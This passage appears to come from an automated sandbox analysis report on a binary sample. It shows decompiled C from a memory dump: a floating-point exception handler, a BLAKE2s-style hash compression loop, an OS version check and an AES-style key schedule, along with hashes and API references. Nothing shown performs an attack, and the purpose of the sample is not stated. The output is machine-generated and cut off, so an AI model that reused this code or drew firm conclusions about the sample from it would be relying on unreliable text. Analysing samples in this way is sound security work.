          				 *(_a4 + 8) = 0;
          				 *(_a4 + 0xc) = 0;
          				_t242 = _a12;
          				if((_t242 & 0x00000010) != 0) {
          					_t262 = 0xc000008f;
          					 *(_a4 + 4) =  *(_a4 + 4) | 1;
          				}
          				if((_t242 & 0x00000002) != 0) {
          					_t262 = 0xc0000093;
          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
          				}
          				if((_t242 & 0x00000001) != 0) {
          					_t262 = 0xc0000091;
          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
          				}
          				if((_t242 & 0x00000004) != 0) {
          					_t262 = 0xc000008e;
          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
          				}
          				if((_t242 & 0x00000008) != 0) {
          					_t262 = 0xc0000090;
          					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
          				}
          				_t265 = _a8;
          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
          				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
          				_t259 = E0021DFB6(_a4);
          				if((_t259 & 0x00000001) != 0) {
          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
          				}
          				if((_t259 & 0x00000004) != 0) {
          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
          				}
          				if((_t259 & 0x00000008) != 0) {
          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
          				}
          				if((_t259 & 0x00000010) != 0) {
          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
          				}
          				if((_t259 & 0x00000020) != 0) {
          					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
          				}
          				_t172 =  *_t265 & 0x00000c00;
          				if(_t172 == 0) {
          					 *_a4 =  *_a4 & 0xfffffffc;
          				} else {
          					if(_t172 == 0x400) {
          						_t257 = _a4;
          						_t225 =  *_t257 & 0xfffffffd | 1;
          						L26:
          						 *_t257 = _t225;
          						L29:
          						_t175 =  *_t265 & 0x00000300;
          						if(_t175 == 0) {
          							_t250 = _a4;
          							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
          							L35:
          							 *_t250 = _t178;
          							L36:
          							_t179 = _a4;
          							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
          							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
          							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
          							if(_a28 == 0) {
          								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
          								 *((long long*)(_a4 + 0x10)) =  *_a20;
          								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
          								_t254 = _a4;
          								_t240 = _a24;
          								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
          								 *(_a4 + 0x50) =  *_t240;
          							} else {
          								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
          								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
          								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
          								_t240 = _a24;
          								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
          								 *(_a4 + 0x50) =  *_t240;
          							}
          							E0021DF1C(_t254);
          							RaiseException(_t262, 0, 1,  &_a4);
          							_t256 = _a4;
          							if((_t256[2] & 0x00000010) != 0) {
          								 *_t265 =  *_t265 & 0xfffffffe;
          							}
          							if((_t256[2] & 0x00000008) != 0) {
          								 *_t265 =  *_t265 & 0xfffffffb;
          							}
          							if((_t256[2] & 0x00000004) != 0) {
          								 *_t265 =  *_t265 & 0xfffffff7;
          							}
          							if((_t256[2] & 0x00000002) != 0) {
          								 *_t265 =  *_t265 & 0xffffffef;
          							}
          							if((_t256[2] & 0x00000001) != 0) {
          								 *_t265 =  *_t265 & 0xffffffdf;
          							}
          							_t195 =  *_t256 & 0x00000003;
          							if(_t195 == 0) {
          								 *_t265 =  *_t265 & 0xfffff3ff;
          							} else {
          								_t206 = _t195 - 1;
          								if(_t206 == 0) {
          									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
          									L55:
          									 *_t265 = _t209;
          									L58:
          									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
          									if(_t199 == 0) {
          										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
          										L64:
          										 *_t265 = _t202;
          										L65:
          										if(_a28 == 0) {
          											 *_t240 = _t256[0x14];
          										} else {
          											 *_t240 = _t256[0x14];
          										}
          										return _t202;
          									}
          									_t203 = _t199 - 1;
          									if(_t203 == 0) {
          										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
          										goto L64;
          									}
          									_t202 = _t203 - 1;
          									if(_t202 == 0) {
          										 *_t265 =  *_t265 & 0xfffff3ff;
          									}
          									goto L65;
          								}
          								_t210 = _t206 - 1;
          								if(_t210 == 0) {
          									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
          									goto L55;
          								}
          								if(_t210 == 1) {
          									 *_t265 =  *_t265 | 0x00000c00;
          								}
          							}
          							goto L58;
          						}
          						if(_t175 == 0x200) {
          							_t250 = _a4;
          							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
          							goto L35;
          						}
          						if(_t175 == 0x300) {
          							 *_a4 =  *_a4 & 0xffffffe3;
          						}
          						goto L36;
          					}
          					if(_t172 == 0x800) {
          						_t257 = _a4;
          						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
          						goto L26;
          					}
          					if(_t172 == 0xc00) {
          						 *_a4 =  *_a4 | 0x00000003;
          					}
          				}
          			}
























          APIs
          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0022064F,?,?,00000008,?,?,002202EF,00000000), ref: 00220881
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ExceptionRaise
          • String ID:
          • API String ID: 3997070919-0
          • Opcode ID: afa3f8451d09a94e9895c0639fd33096b4c7102257805bb048237ae77cc5ca72
          • Instruction ID: b57f862bb6e58c15f68c825049d2f201e7f4d344bcfab095daaf64eec25fb949
          • Opcode Fuzzy Hash: afa3f8451d09a94e9895c0639fd33096b4c7102257805bb048237ae77cc5ca72
          • Instruction Fuzzy Hash: 8AB17C35520619EFD714CF68D4CAB657BE0FF44324F258658E89ACF2A2C335E9A1CB40
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 81%
          			E001F3EAD() {
          				void* _t230;
          				signed int* _t231;
          				intOrPtr _t240;
          				signed int _t245;
          				intOrPtr _t246;
          				signed int _t257;
          				intOrPtr _t258;
          				signed int _t269;
          				intOrPtr _t270;
          				signed int _t275;
          				signed int _t280;
          				signed int _t285;
          				signed int _t290;
          				signed int _t295;
          				intOrPtr _t296;
          				signed int _t301;
          				intOrPtr _t302;
          				signed int _t307;
          				intOrPtr _t308;
          				signed int _t313;
          				intOrPtr _t314;
          				signed int _t319;
          				signed int _t324;
          				signed int _t329;
          				signed int _t333;
          				signed int _t334;
          				signed int _t336;
          				signed int _t337;
          				signed int _t338;
          				signed int _t340;
          				signed int _t341;
          				signed int _t342;
          				signed int _t348;
          				signed int _t350;
          				signed int _t351;
          				signed int _t353;
          				signed int _t355;
          				signed int _t356;
          				signed int _t358;
          				signed int _t360;
          				signed int _t362;
          				signed int _t363;
          				signed int _t365;
          				signed int _t366;
          				signed int _t368;
          				signed int _t369;
          				signed int _t371;
          				signed int _t372;
          				signed int _t374;
          				signed int _t375;
          				intOrPtr _t376;
          				intOrPtr _t377;
          				signed int _t379;
          				signed int _t381;
          				intOrPtr _t383;
          				signed int _t385;
          				signed int _t386;
          				signed int _t388;
          				signed int _t389;
          				signed int _t390;
          				signed int _t391;
          				signed int _t392;
          				signed int _t393;
          				signed int _t394;
          				signed int _t395;
          				intOrPtr _t396;
          				signed int _t398;
          				intOrPtr _t399;
          				signed int _t407;
          				signed int _t409;
          				signed int _t411;
          				signed int _t412;
          				signed int _t414;
          				signed int _t418;
          				signed int _t420;
          				signed int _t422;
          				signed int _t423;
          				signed int _t425;
          				signed int _t427;
          				signed int _t429;
          				intOrPtr _t431;
          				signed int _t433;
          				intOrPtr _t434;
          				void* _t435;
          				void* _t436;
          				void* _t437;
          
          				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
          				_t342 = 0x10;
          				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
          				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
          				_t436 = _t435 + 0xc;
          				_push(8);
          				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
          				_t437 = _t436 + 0xc;
          				_t418 =  *_t230 ^ 0x510e527f;
          				_t231 =  *(_t377 + 0xfc);
          				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
          				_t334 =  *(_t437 + 0x64);
          				 *(_t437 + 0x28) = 0x6a09e667;
          				 *(_t437 + 0x30) = 0xbb67ae85;
          				_t379 =  *_t231 ^ 0x1f83d9ab;
          				_t348 =  *(_t437 + 0x5c);
          				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
          				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
          				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
          				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
          				 *(_t437 + 0x38) =  *(_t437 + 0x54);
          				 *(_t437 + 0x20) =  *(_t437 + 0x50);
          				 *((intOrPtr*)(_t437 + 0x10)) = 0;
          				 *((intOrPtr*)(_t437 + 0x48)) = 0;
          				_t427 =  *(_t437 + 0x44);
          				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
          				_t240 =  *((intOrPtr*)(_t437 + 0x10));
          				 *(_t437 + 0x24) = 0xa54ff53a;
          				 *(_t437 + 0x40) = _t334;
          				 *(_t437 + 0x34) = _t348;
          				do {
          					_t37 = _t240 + 0x2223b0; // 0x3020100
          					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
          					 *(_t437 + 0x14) = _t350;
          					_t351 = _t350 ^ _t418;
          					asm("rol ecx, 0x10");
          					_t245 =  *(_t437 + 0x28) + _t351;
          					_t420 =  *(_t437 + 0x34) ^ _t245;
          					 *(_t437 + 0x28) = _t245;
          					_t246 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror esi, 0xc");
          					 *(_t437 + 0x34) = _t420;
          					_t48 = _t246 + 0x2223b1; // 0x4030201
          					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
          					 *(_t437 + 0x14) = _t422;
          					_t423 = _t422 ^ _t351;
          					asm("ror esi, 0x8");
          					_t353 =  *(_t437 + 0x28) + _t423;
          					 *(_t437 + 0x28) = _t353;
          					asm("ror eax, 0x7");
          					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
          					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x2223b2; // 0x5040302
          					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
          					 *(_t437 + 0x20) = _t355;
          					_t356 = _t355 ^ _t407;
          					asm("rol ecx, 0x10");
          					_t257 =  *(_t437 + 0x30) + _t356;
          					_t409 =  *(_t437 + 0x1c) ^ _t257;
          					 *(_t437 + 0x30) = _t257;
          					_t258 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror edi, 0xc");
          					 *(_t437 + 0x1c) = _t409;
          					_t71 = _t258 + 0x2223b3; // 0x6050403
          					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
          					 *(_t437 + 0x20) = _t411;
          					_t412 = _t411 ^ _t356;
          					asm("ror edi, 0x8");
          					_t358 =  *(_t437 + 0x30) + _t412;
          					 *(_t437 + 0x30) = _t358;
          					asm("ror eax, 0x7");
          					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
          					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x2223b4; // 0x7060504
          					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
          					_t360 = _t336 ^ _t379;
          					asm("rol ecx, 0x10");
          					_t269 =  *(_t437 + 0x18) + _t360;
          					_t381 =  *(_t437 + 0x40) ^ _t269;
          					 *(_t437 + 0x18) = _t269;
          					_t270 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror edx, 0xc");
          					_t91 = _t270 + 0x2223b5; // 0x8070605
          					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
          					 *(_t437 + 0x38) = _t337;
          					_t338 = _t337 ^ _t360;
          					asm("ror ebx, 0x8");
          					_t275 =  *(_t437 + 0x18) + _t338;
          					 *(_t437 + 0x18) = _t275;
          					asm("ror edx, 0x7");
          					 *(_t437 + 0x40) = _t381 ^ _t275;
          					_t383 =  *((intOrPtr*)(_t437 + 0x10));
          					_t101 = _t383 + 0x2223b6; // 0x9080706
          					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
          					 *(_t437 + 0x2c) = _t362;
          					_t363 = _t362 ^ _t427;
          					asm("rol ecx, 0x10");
          					_t280 =  *(_t437 + 0x24) + _t363;
          					_t429 =  *(_t437 + 0x3c) ^ _t280;
          					 *(_t437 + 0x24) = _t280;
          					_t110 = _t383 + 0x2223b7; // 0xa090807
          					asm("ror ebp, 0xc");
          					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
          					 *(_t437 + 0x2c) = _t385;
          					_t386 = _t385 ^ _t363;
          					asm("ror edx, 0x8");
          					_t285 =  *(_t437 + 0x24) + _t386;
          					 *(_t437 + 0x24) = _t285;
          					asm("ror ebp, 0x7");
          					 *(_t437 + 0x3c) = _t429 ^ _t285;
          					_t431 =  *((intOrPtr*)(_t437 + 0x10));
          					_t121 = _t431 + 0x2223b8; // 0xb0a0908
          					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
          					 *(_t437 + 0x14) = _t365;
          					_t366 = _t365 ^ _t386;
          					asm("rol ecx, 0x10");
          					_t290 =  *(_t437 + 0x18) + _t366;
          					_t388 =  *(_t437 + 0x1c) ^ _t290;
          					 *(_t437 + 0x18) = _t290;
          					_t130 = _t431 + 0x2223b9; // 0xc0b0a09
          					asm("ror edx, 0xc");
          					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
          					 *(_t437 + 0x14) = _t433;
          					 *(_t437 + 0x4c) = _t433;
          					_t427 = _t433 ^ _t366;
          					asm("ror ebp, 0x8");
          					_t295 =  *(_t437 + 0x18) + _t427;
          					_t389 = _t388 ^ _t295;
          					 *(_t437 + 0x18) = _t295;
          					 *(_t437 + 0x74) = _t295;
          					_t296 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror edx, 0x7");
          					 *(_t437 + 0x1c) = _t389;
          					 *(_t437 + 0x60) = _t389;
          					_t144 = _t296 + 0x2223ba; // 0xd0c0b0a
          					_t390 =  *(_t437 + 0x40);
          					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
          					 *(_t437 + 0x20) = _t368;
          					_t369 = _t368 ^ _t423;
          					asm("rol ecx, 0x10");
          					_t301 =  *(_t437 + 0x24) + _t369;
          					_t391 = _t390 ^ _t301;
          					 *(_t437 + 0x24) = _t301;
          					_t302 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror edx, 0xc");
          					_t154 = _t302 + 0x2223bb; // 0xe0d0c0b
          					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
          					 *(_t437 + 0x20) = _t425;
          					 *(_t437 + 0x50) = _t425;
          					_t418 = _t425 ^ _t369;
          					asm("ror esi, 0x8");
          					_t307 =  *(_t437 + 0x24) + _t418;
          					_t392 = _t391 ^ _t307;
          					 *(_t437 + 0x24) = _t307;
          					 *(_t437 + 0x78) = _t307;
          					_t308 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror edx, 0x7");
          					 *(_t437 + 0x40) = _t392;
          					 *(_t437 + 0x64) = _t392;
          					_t167 = _t308 + 0x2223bc; // 0xf0e0d0c
          					_t393 =  *(_t437 + 0x3c);
          					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
          					 *(_t437 + 0x38) = _t371;
          					_t372 = _t371 ^ _t412;
          					asm("rol ecx, 0x10");
          					_t313 =  *(_t437 + 0x28) + _t372;
          					_t394 = _t393 ^ _t313;
          					 *(_t437 + 0x28) = _t313;
          					_t314 =  *((intOrPtr*)(_t437 + 0x10));
          					asm("ror edx, 0xc");
          					_t177 = _t314 + 0x2223bd; // 0xe0f0e0d
          					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
          					 *(_t437 + 0x38) = _t414;
          					 *(_t437 + 0x54) = _t414;
          					_t407 = _t414 ^ _t372;
          					asm("ror edi, 0x8");
          					_t319 =  *(_t437 + 0x28) + _t407;
          					_t395 = _t394 ^ _t319;
          					 *(_t437 + 0x28) = _t319;
          					asm("ror edx, 0x7");
          					 *(_t437 + 0x3c) = _t395;
          					 *(_t437 + 0x68) = _t395;
          					_t396 =  *((intOrPtr*)(_t437 + 0x10));
          					 *(_t437 + 0x6c) = _t319;
          					_t190 = _t396 + 0x2223be; // 0xa0e0f0e
          					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
          					 *(_t437 + 0x2c) = _t374;
          					_t375 = _t374 ^ _t338;
          					asm("rol ecx, 0x10");
          					_t324 =  *(_t437 + 0x30) + _t375;
          					_t340 =  *(_t437 + 0x34) ^ _t324;
          					 *(_t437 + 0x30) = _t324;
          					_t199 = _t396 + 0x2223bf; // 0x40a0e0f
          					asm("ror ebx, 0xc");
          					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
          					 *(_t437 + 0x2c) = _t398;
          					 *(_t437 + 0x58) = _t398;
          					_t379 = _t398 ^ _t375;
          					asm("ror edx, 0x8");
          					_t329 =  *(_t437 + 0x30) + _t379;
          					_t341 = _t340 ^ _t329;
          					 *(_t437 + 0x30) = _t329;
          					 *(_t437 + 0x70) = _t329;
          					asm("ror ebx, 0x7");
          					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
          					 *(_t437 + 0x34) = _t341;
          					_t348 =  *(_t437 + 0x34);
          					 *(_t437 + 0x5c) = _t341;
          					_t334 =  *(_t437 + 0x40);
          					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
          				} while (_t240 <= 0x90);
          				 *(_t437 + 0x84) = _t379;
          				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
          				 *(_t437 + 0x88) = _t427;
          				_t434 =  *((intOrPtr*)(_t437 + 0x48));
          				 *(_t437 + 0x7c) = _t418;
          				 *(_t437 + 0x80) = _t407;
          				do {
          					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
          					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
          					 *(_t376 + _t434) = _t333;
          					_t434 = _t434 + 4;
          				} while (_t434 < 0x20);
          				return _t333;
          			}


























































































          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: gj
          • API String ID: 0-4203073231
          • Opcode ID: cec1b0839fe0e7e53828acf05d1da3ce1043d50940c2b7b9813a00f2e8882c4f
          • Instruction ID: 277a57018692cebae631a5fe71f4a4d3a99039a798ff43c1fbf09b8bf00b9f18
          • Opcode Fuzzy Hash: cec1b0839fe0e7e53828acf05d1da3ce1043d50940c2b7b9813a00f2e8882c4f
          • Instruction Fuzzy Hash: 70F1E4B2A083419FC748CF29D880A1AFBE1BFC8208F15896EF598D7715D734E9458F56
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FA995() {
          				struct _OSVERSIONINFOW _v280;
          				signed int _t6;
          				intOrPtr _t12;
          				intOrPtr _t13;
          
          				_t12 =  *0x22d020; // 0x2
          				if(_t12 != 0xffffffff) {
          					_t6 =  *0x2300f0; // 0xa
          					_t13 =  *0x2300f4; // 0x0
          				} else {
          					_v280.dwOSVersionInfoSize = 0x114;
          					GetVersionExW( &_v280);
          					_t12 = _v280.dwPlatformId;
          					_t6 = _v280.dwMajorVersion;
          					_t13 = _v280.dwMinorVersion;
          					 *0x22d020 = _t12;
          					 *0x2300f0 = _t6;
          					 *0x2300f4 = _t13;
          				}
          				if(_t12 != 2) {
          					return 0x501;
          				} else {
          					return (_t6 << 8) + _t13;
          				}
          			}








          APIs
          • GetVersionExW.KERNEL32(?), ref: 001FA9BA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Version
          • String ID:
          • API String ID: 1889659487-0
          • Opcode ID: 8f9ee677a6feb28262f34ebe3aabb198b3c5cf2ce8b64907e28414cf30bb23f9
          • Instruction ID: d8a7103c4da058783201837cd1917e022b7ae56d23c17c4897c070c8d77b671e
          • Opcode Fuzzy Hash: 8f9ee677a6feb28262f34ebe3aabb198b3c5cf2ce8b64907e28414cf30bb23f9
          • Instruction Fuzzy Hash: 74F01DB094421C8BC72CCB58FD99BF573A5FB58314F6042A5DE1943350E3B4AE859EA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FE510(intOrPtr __ecx, signed char _a4) {
          				char _v12;
          				signed int _v13;
          				signed int _v14;
          				signed int _v15;
          				signed int _v16;
          				signed char _v17;
          				signed char _v18;
          				signed char _v19;
          				signed char _v20;
          				char _v28;
          				signed int _v29;
          				signed int _v30;
          				signed int _v31;
          				signed int _v32;
          				signed int _v36;
          				intOrPtr _v40;
          				signed char _t96;
          				signed int _t117;
          				signed int* _t121;
          				signed int* _t122;
          				void* _t124;
          				signed int _t125;
          				signed int _t126;
          				signed int _t127;
          				void* _t129;
          				void* _t130;
          				signed int _t131;
          				char* _t132;
          				void* _t133;
          				signed int _t135;
          				intOrPtr _t137;
          				signed char* _t139;
          				void* _t141;
          				void* _t161;
          				void* _t164;
          
          				_t137 = __ecx;
          				_t135 = _a4 - 6;
          				_v40 = __ecx;
          				_v36 = _t135;
          				_t96 = E0020EA80( &_v32, _a4, 0x20);
          				_t141 =  &_v40 + 0xc;
          				_t117 = 0;
          				_t133 = 0;
          				_t126 = 0;
          				if(_t135 <= 0) {
          					L10:
          					if(_t117 <= _a4) {
          						_t127 = 0x234330;
          						do {
          							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0x234130);
          							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0x234130);
          							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0x234130);
          							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0x234130);
          							_t96 =  *_t127;
          							_v32 = _v32 ^ _t96;
          							_v36 = _t127 + 1;
          							if(_t135 == 8) {
          								_t121 =  &_v28;
          								_a4 = 3;
          								do {
          									_t129 = 4;
          									do {
          										 *_t121 =  *_t121 ^  *(_t121 - 4);
          										_t121 =  &(_t121[0]);
          										_t129 = _t129 - 1;
          									} while (_t129 != 0);
          									_t58 =  &_a4;
          									 *_t58 = _a4 - 1;
          								} while ( *_t58 != 0);
          								_t122 =  &_v12;
          								_a4 = 3;
          								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x234130);
          								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x234130);
          								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x234130);
          								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x234130);
          								do {
          									_t130 = 4;
          									do {
          										_t96 =  *((intOrPtr*)(_t122 - 4));
          										 *_t122 =  *_t122 ^ _t96;
          										_t122 =  &(_t122[0]);
          										_t130 = _t130 - 1;
          									} while (_t130 != 0);
          									_t79 =  &_a4;
          									 *_t79 = _a4 - 1;
          								} while ( *_t79 != 0);
          							} else {
          								if(_t135 > 1) {
          									_t132 =  &_v28;
          									_a4 = _t135 - 1;
          									do {
          										_t124 = 0;
          										do {
          											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
          											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
          											_t124 = _t124 + 1;
          										} while (_t124 < 4);
          										_t132 = _t132 + 4;
          										_t53 =  &_a4;
          										 *_t53 = _a4 - 1;
          									} while ( *_t53 != 0);
          								}
          							}
          							_t131 = 0;
          							if(_t135 <= 0) {
          								L37:
          								_t164 = _t117 - _a4;
          							} else {
          								while(_t117 <= _a4) {
          									if(_t131 >= _t135) {
          										L33:
          										_t161 = _t133 - 4;
          									} else {
          										_t96 =  &(( &_v32)[_t131]);
          										_a4 = _t96;
          										while(_t133 < 4) {
          											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
          											_t131 = _t131 + 1;
          											_t96 = _a4 + 4;
          											_t133 = _t133 + 1;
          											_a4 = _t96;
          											if(_t131 < _t135) {
          												continue;
          											} else {
          												goto L33;
          											}
          											goto L34;
          										}
          									}
          									L34:
          									if(_t161 == 0) {
          										_t117 = _t117 + 1;
          										_t133 = 0;
          									}
          									if(_t131 < _t135) {
          										continue;
          									} else {
          										goto L37;
          									}
          									goto L38;
          								}
          							}
          							L38:
          							_t127 = _v36;
          						} while (_t164 <= 0);
          					}
          				} else {
          					while(_t117 <= _a4) {
          						if(_t126 < _t135) {
          							_t139 =  &(( &_v32)[_t126]);
          							while(_t133 < 4) {
          								_t125 = _t133 + _t117 * 4;
          								_t96 =  *_t139;
          								_t126 = _t126 + 1;
          								_t139 =  &_a4;
          								_t133 = _t133 + 1;
          								 *(_v40 + 0x18 + _t125 * 4) = _t96;
          								_t135 = _v36;
          								if(_t126 < _t135) {
          									continue;
          								}
          								break;
          							}
          							_t137 = _v40;
          						}
          						if(_t133 == 4) {
          							_t117 = _t117 + 1;
          							_t133 = 0;
          						}
          						if(_t126 < _t135) {
          							continue;
          						} else {
          							goto L10;
          						}
          						goto L39;
          					}
          				}
          				L39:
          				return _t96;
          			}







































          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
